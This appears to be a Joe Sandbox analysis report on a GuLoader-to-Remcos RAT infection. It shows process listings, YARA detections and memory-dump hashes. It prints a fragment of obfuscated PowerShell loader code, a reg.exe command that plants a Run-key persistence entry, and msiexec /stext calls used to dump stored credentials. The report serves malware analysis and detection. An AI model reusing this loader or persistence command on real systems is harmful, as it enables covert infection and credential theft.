nuntes Odi.RounDSad,oSidsw LunnGalcl.radoaktiacynodApprF aboiD.fflAutoeSibs(Agra$AfseTPremh TidiHemirNa udkbere usinTurrdSchoeim.oa n.sl Van,Re,y$CoroN FjeoPhrenHerauAft sByp eIantrThorsWeat)Nedr ';$Nonusers=$Engrospriserne;Indsigelser (Overfallen 'Reel$ irtg agalArbeoT rtbCas A,kspLIndd:Graet avnRL,baeframsKnneiSem D AsteSmmeD,aanEjudaS Hy,=Dist(NachTImpuEFa ts,bbatThob-LaryPsoc,A HintPro HHnge Unsu$pastnOpnao AwnN ltrUAlkaSRaptETarmr WassMarm) Tox ');while (!$Tresidedes) {Indsigelser (Overfallen 'Nskv$sammgIn ilCr,moBeatbLadea ChulSimu:WinnSQuilaTronmAffalEpiteHirtmFe,saFll p S lpTesteTrain,kaa=L,kt$KimotBrysrF niu Re eS cs ') ;Indsigelser $Makkerens;Indsigelser (Overfallen 'Fo mS.ybetAc,daAm.iRRapptBrea-Puncs rolL uze StaEP orPShod Revi4Info ');Indsigelser (Overfallen 'le c$Ko eGMisel T.oOSinoBNomaAM ssL Eks:Die.t EgerflagEPhossA,rai Pr dTwisEWooddCirceE,ges Jun=Udes(S ustTheceApodsSkretMel -MisbPKongaViseTVintH Lsk Nonp$Tnknn belo.ancNAll USkabSMarieSpitr DucSdonk)de.l ') ;Indsigelser (Overfallen ' ee$ AntGObsel of.o SmebTerma ellPrei: ilsU O,sNSemiSProdyGarnSGigmTRekoE JewM CouaV kstPlaiiEx,esTi biSultNrebsgDi csRs,n=Valg$F.ung CulL,hreoCol bUi,dAArbeL N s: TeaUAktiN TessPolyURingCSammc Sp eWowsESemidWongi VinnRhinGPeev+Lyri+Ele,%D oz$PaleI FornUdglDS.gtOFemtmBlaaaEsteBRestl Kome Cri.RoofcMilioPsycUIndlngernT Hi ') ;$Thirdendeal=$Indomable[$unsystematisings];}$Brasilete=297855;$Dunkelt=31467;Indsigelser (Overfallen 'F ra$A ilg ReolRe.eoSupeb ForaS,ucLSt.f: rbeaContBWorkjMediE.humC Na TKupp Kne= T.l DatgNo me.aisTGlis-ForscDkk,OVldiN Selt L mESmlenHoffT Sti Eund$Angun atoUsocN UdvUpa kSIn uE InyRSy aS fte ');Indsigelser (Overfallen ' Ant$TilbgD khl ApooForsbHalfaSexclProt:WeenAT enr.aedaAchlc SpehS penVogeiogeed veta LasnEdri Dags= t.t Subl[ elS IntyDrivsb.zotRelae intmSk t. oadCBabuoScolnHa ivConce JenrLimft abs]We p:,ole:vandFKon rSynpoSealm WheBJag aSgetsBrugeKost6Macu4 UndS ingtU.akrGalai InfnGenog.eds(Gale$RendaBolibConvjLoope BjlcCalot Ko )Wewe ');Indsigelser (Overfallen ' mpl$ TubGS.igLUdnvOKongBIndiA .ntLP,os:Ov.rNTeleMe anTRece Glio= Can mov[CornS angYH.posOmbytUrocErimemUnsw.ArtiTBr.mE M.sxBronT nn.Pante inNKnogC Chao CoaD UnbIAlmuNLio g Reg] Ude: .ar:MickA FraSInteCM goideniIdive.Bespggrone FortVollSLaagtbr wrLo dIKe inEspeGKapi(opkl$BisiAUdtrRSupeA Be,cSudaHBlasNLuetis.ordN ncaAn.eN Rat)Vava ');Indsigelser (Overfallen 'Spha$Bes GUnralLanaObataBVandA DecLEnkr:.oneTNordUE,ipiTalr=Kare$EumiN.quaMresptVoca. Ga.SOmsmUSup.BHollS ,roTSamfRKla,iZealNStadg Mar(syge$ WalB Gr,ReuroAA.tiS toiBi eLem.oeSlyptBiltETrma, For$ irkDblgeUAfp.nCu tkSpriERumllYtretBade)Anno ');Indsigelser $Tui;"
                                                            Imagebase:0xcc0000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2041820420.00000000083A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2042394104.0000000008B40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2020592068.000000000568C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:06:39:12
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:06:39:33
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                            Imagebase:0x90000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2951565142.00000000021BF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2957967933.00000000095B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:10
                                                            Start time:06:39:44
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"
                                                            Imagebase:0x240000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:06:39:44
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:06:39:44
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Consanguineous% -windowstyle 1 $Aboriginal=(gp -Path 'HKCU:\Software\involving\').Elgkos;%Consanguineous% ($Aboriginal)"
                                                            Imagebase:0x890000
                                                            File size:59'392 bytes
                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:06:40:05
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\tmzmicbwjbyewkukqymzvfa"
                                                            Imagebase:0x90000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:06:40:05
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr"
                                                            Imagebase:0x90000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:06:40:05
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vpnfiulxxjqjgqiohjztgknpdr"
                                                            Imagebase:0x90000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:06:40:05
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gjsxjnwrlsioiwwsrulujxhgmfcdr"
                                                            Imagebase:0x90000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Reset < >
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853817924.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52348cc4c33c99bbdc4c3fb7fab9bfa7b3e644759e0283d7ea5bbb51fb375a16
                                                              • Instruction ID: a43e254cec820c22865cb230dbee1b1bc91df46359217c040b459be3797c0749
                                                              • Opcode Fuzzy Hash: 52348cc4c33c99bbdc4c3fb7fab9bfa7b3e644759e0283d7ea5bbb51fb375a16
                                                              • Instruction Fuzzy Hash: 3E021862A1FBD91FE766976848651687BE2EF56320F0901FFD09CCB1E3DA186C46C342
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853225411.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b870000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af5e017ca0599ce3150e2757d2044d5271c9f9b1f803b218744e14eafacd6c96
                                                              • Instruction ID: df4e04e2578f3ea74338465ba69f95a12509a77882160f8c3cd75fe2265da8fb
                                                              • Opcode Fuzzy Hash: af5e017ca0599ce3150e2757d2044d5271c9f9b1f803b218744e14eafacd6c96
                                                              • Instruction Fuzzy Hash: 68F1D930A1DA4E8FEBA8DF28C8657E937D1FF58310F14426EE84DC7295DB3499418782
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853225411.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b870000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b8a20757441a0cd45575788ae265a30f2b9ad2002fe4d3cc648d582f583c55d
                                                              • Instruction ID: f27e98051033a389ecbf928b7447becb25bed0b087aba53478ddae4ddc597e5b
                                                              • Opcode Fuzzy Hash: 9b8a20757441a0cd45575788ae265a30f2b9ad2002fe4d3cc648d582f583c55d
                                                              • Instruction Fuzzy Hash: DCE1C530A09A4D8FEBA8DF28C8657E977D1FF58310F14427AE84DC7295DF7899418B81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853225411.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b870000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 56dc38040be11ceeafa13e7b9ed19077e4aaad6dee699b7559c6390909595d09
                                                              • Instruction ID: a74cc924bfad318c67b9c800f01e3a18d328b83c17c8e0983abf01f38ddd4991
                                                              • Opcode Fuzzy Hash: 56dc38040be11ceeafa13e7b9ed19077e4aaad6dee699b7559c6390909595d09
                                                              • Instruction Fuzzy Hash: 58228270A18A4D8FDF98EF5CC4A5EA9B7E1FFA8304F14416AD409D7295CB35E881CB81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853817924.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f8bc4389a17e70f79ca9fe5e95c62489800961fda8bb70529b47345f7a268f96
                                                              • Instruction ID: f284a9f7214f78fecfd98405d863bd347a699c7727502189fd1810c2d2b7a6c9
                                                              • Opcode Fuzzy Hash: f8bc4389a17e70f79ca9fe5e95c62489800961fda8bb70529b47345f7a268f96
                                                              • Instruction Fuzzy Hash: 37A12B32B1FA9E1FE7A9976C587667537D2EF42610B0901BFD05DC32E3ED19A9028342
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853225411.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b870000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7da4fe8e6eec2164dc7f64d84e024a207eb5e8b388d2ec7243f45236c180846
                                                              • Instruction ID: 05d78c1e9c27521ccd4b4cd70fb86a8b45ea7733c448f38fb847fa71305535af
                                                              • Opcode Fuzzy Hash: b7da4fe8e6eec2164dc7f64d84e024a207eb5e8b388d2ec7243f45236c180846
                                                              • Instruction Fuzzy Hash: 2FB1B63060DA8D4FDB68DF28D8A57E93BD1EF59310F04826EE84DC7296DE349945CB82
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853817924.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88ab3111a405d19dcf73cceba47791f29e48ede5025d2a2e259a6941efff5d8e
                                                              • Instruction ID: da59874dfc322dd6fcbe66acc7404e25fab55002679b3576d040f298b81498c3
                                                              • Opcode Fuzzy Hash: 88ab3111a405d19dcf73cceba47791f29e48ede5025d2a2e259a6941efff5d8e
                                                              • Instruction Fuzzy Hash: 6121E522B2FAAA1FE7B99768587127463C3EF81650B5901BED05CC73E7ED19AC015201
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853225411.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b870000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fad6c7a3b2ff07f0bd2dba4682288643ff2f8846e7edc0aa9fd066a5850982ae
                                                              • Instruction ID: 435e8b97bd44f0adb0f2bd2038a7e04f0218a06f958685e2aea6acf330b8eff6
                                                              • Opcode Fuzzy Hash: fad6c7a3b2ff07f0bd2dba4682288643ff2f8846e7edc0aa9fd066a5850982ae
                                                              • Instruction Fuzzy Hash: 3931FE30A1954E8EFBB4DF54CCAABF93296FF4931DF410139D50D870A2CA386A85DB12
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853817924.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd725434a98eb33c0e802b768ca2a5dc97c759625b639897a0d02825799e0e83
                                                              • Instruction ID: 02019ab26fec4c3207362692fb77d25403b7f10e217abc7d838ba6da91b5520c
                                                              • Opcode Fuzzy Hash: dd725434a98eb33c0e802b768ca2a5dc97c759625b639897a0d02825799e0e83
                                                              • Instruction Fuzzy Hash: 8E21E253F1FAEA1FF7A5967C18751642FD29F56A58B0900BEC09CC71E3D8185D098351
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853817924.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 90ba27149c17363165c9e3a06a21b583084a677de0a7ea741608ce583f976f5d
                                                              • Instruction ID: ae7ebc700ce24731d8a249e44f22da495aeb9e693cefd14ef8d5c941f48b9838
                                                              • Opcode Fuzzy Hash: 90ba27149c17363165c9e3a06a21b583084a677de0a7ea741608ce583f976f5d
                                                              • Instruction Fuzzy Hash: B521D722B1F7990FEB69977C58661BCBBD2EF55220F0401FAD09CC70E3EE1929048742
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853817924.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 27de09e30ebcd7103539e7cd29c9ee9e53736639bbd75f30e70c5340df7a218d
                                                              • Instruction ID: f6c1a22d25d52579480eb9f8ca2ba2965dc9be48dd496d49d690f4f27044a1e3
                                                              • Opcode Fuzzy Hash: 27de09e30ebcd7103539e7cd29c9ee9e53736639bbd75f30e70c5340df7a218d
                                                              • Instruction Fuzzy Hash: 7F11DA23F2F9AD1BE7B597A82C351B867D2EF55B50B4901B6D46CC72E7ED086D004341
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853225411.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b870000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                              • Instruction ID: eb7a46cdb0012eff6e5c38bb0d8d527c599f3350d087005d384069ff07837e75
                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                              • Instruction Fuzzy Hash: FD01A73020CB0C4FD748EF0CE451AA5B3E0FB89324F10056DE58AC36A1D632E882CB42
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853817924.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f5b2142f63181e30f9246279ddbb10d7a8dcb52671d58c9702e91cce5517f3d
                                                              • Instruction ID: 403c7c01a4291cba09450cf6972cb39b24504d8eb9d7d5decc8f28123b7228e8
                                                              • Opcode Fuzzy Hash: 2f5b2142f63181e30f9246279ddbb10d7a8dcb52671d58c9702e91cce5517f3d
                                                              • Instruction Fuzzy Hash: 60F0E533B5D91D4AE395966C58261F973D3DFC9131B550277C15EC3196EE15D4064240
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853817924.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55b644224625145105fb98ae50dafec7118d1a14b7adcec7475e2bc085ca748c
                                                              • Instruction ID: baaea035daa4b3e7a381ff18e35334123c80206a2c87e33be74368b40d424d9b
                                                              • Opcode Fuzzy Hash: 55b644224625145105fb98ae50dafec7118d1a14b7adcec7475e2bc085ca748c
                                                              • Instruction Fuzzy Hash: 10F02432B0EE8D4FDF91EB6884958E9BBE1EF6931070401BAD04EC70A2CA29AC44C741
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853817924.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f6e42bd0d55803a82d2ee90c63a2589d92d539bd7f08f6f09b95df65c03f047
                                                              • Instruction ID: f1843e7b1f48f01bbdee22720ea501b45cf7daf9798cb88f2353cbedab84041c
                                                              • Opcode Fuzzy Hash: 6f6e42bd0d55803a82d2ee90c63a2589d92d539bd7f08f6f09b95df65c03f047
                                                              • Instruction Fuzzy Hash: F0F0A73270EE894FEBA5EA6C88E186577D1EF6A31075805FAD05ECB1D7D919EC80C381
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1853817924.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd9b940000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1df239e39da4d8f9cb56b63e062290290679c17d9a4c930585e3040a0b59f0b
                                                              • Instruction ID: d612678f587a984205c1f84a0af202c5b402adec269148279c31f3164dba260d
                                                              • Opcode Fuzzy Hash: e1df239e39da4d8f9cb56b63e062290290679c17d9a4c930585e3040a0b59f0b
                                                              • Instruction Fuzzy Hash: C6E0DF33F1EA190EFB9CA55C7C270FDB3C2EF81120759087FD54EC2097E91AA8268245
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ac2c59f7698fb9e9589cf80c44cf0ddd5bc8d931e1b0cb8b12929b36b2b213e3
                                                              • Instruction ID: 9e6474e54c1fae3e08b6ea44bf34913b2b2c266be037d6b9089aed05eb94c140
                                                              • Opcode Fuzzy Hash: ac2c59f7698fb9e9589cf80c44cf0ddd5bc8d931e1b0cb8b12929b36b2b213e3
                                                              • Instruction Fuzzy Hash: 5AB14D70F00219DFDF14CFA9D9857AEBBF2AF88314F248129E815EB255EB749845CB81
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2002608933.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_a90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a128d80731bd583333cf2d4ca5889866a1d892c92b9eeb527a2b8140f76e505f
                                                              • Instruction ID: 865a8d61b3bd6419594d27129605dc35f83074ed9937bfc4db7c5576a9338b8e
                                                              • Opcode Fuzzy Hash: a128d80731bd583333cf2d4ca5889866a1d892c92b9eeb527a2b8140f76e505f
                                                              • Instruction Fuzzy Hash: CEB13C71F002099FDF14CFA9D9857ADBBF2AF88314F248539D815EB254EB749885CB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                              • API String ID: 0-81657163
                                                              • Opcode ID: 7064bd982a8f7bd78946b6382adb356ac4cefa3fccddc7ac4dbd219852628e8c
                                                              • Instruction ID: 1585042bb1fd5288fe3f0e9b39052e8d729b1161e230c46824b9e670650b637b
                                                              • Opcode Fuzzy Hash: 7064bd982a8f7bd78946b6382adb356ac4cefa3fccddc7ac4dbd219852628e8c
                                                              • Instruction Fuzzy Hash: 001248B0B04206CFCB2A9F68C8146AABBF2AF85710F1484AAD4458F3D5DB31DC45CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.k$-k
                                                              • API String ID: 0-3535620250
                                                              • Opcode ID: 4814ecb9ba76a81679ea604f842d58bd35c84f110b7b10e73a6754568a413df8
                                                              • Instruction ID: 57aa3380b29497120aa9c9eb4be8ca24e6a220a8c11b1a40cce00033d7519b91
                                                              • Opcode Fuzzy Hash: 4814ecb9ba76a81679ea604f842d58bd35c84f110b7b10e73a6754568a413df8
                                                              • Instruction Fuzzy Hash: 61D19C70A002098FDB18DF68C555B9EBBB2AF88344F15C469D4056F395CB76EC86CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                              • API String ID: 0-1608119003
                                                              • Opcode ID: c78a599d2724212ffa7617821c2cfe270ccdce2634cb7e641ba7c471160fcabc
                                                              • Instruction ID: 795fc748d990c5606129b6c9c6958a7ca498aa1fecf8c3624d8d517549b77f4e
                                                              • Opcode Fuzzy Hash: c78a599d2724212ffa7617821c2cfe270ccdce2634cb7e641ba7c471160fcabc
                                                              • Instruction Fuzzy Hash: 14B11971A09346EFCB168F68C854666BFB1AF86610F19C49BD464CF2D2CB31CC46CB62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$x.k$x.k$-k
                                                              • API String ID: 0-323633263
                                                              • Opcode ID: 6ad244741a4b145d5e5690c0696dc812a09ccb97c992c28c909202ee88cea188
                                                              • Instruction ID: f25783cc57e8355d2800ccc71e6479ac7cd448bbec4598633fc53453359ab45d
                                                              • Opcode Fuzzy Hash: 6ad244741a4b145d5e5690c0696dc812a09ccb97c992c28c909202ee88cea188
                                                              • Instruction Fuzzy Hash: DAF19F70A012189FDB24DB68CD51FAABBB2AF84344F1484A9D5096F3E5CB72DD818F91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2034509125.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_71d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'^q$4'^q$4'^q$x.k$-k
                                                              • API String ID: 0-553309075
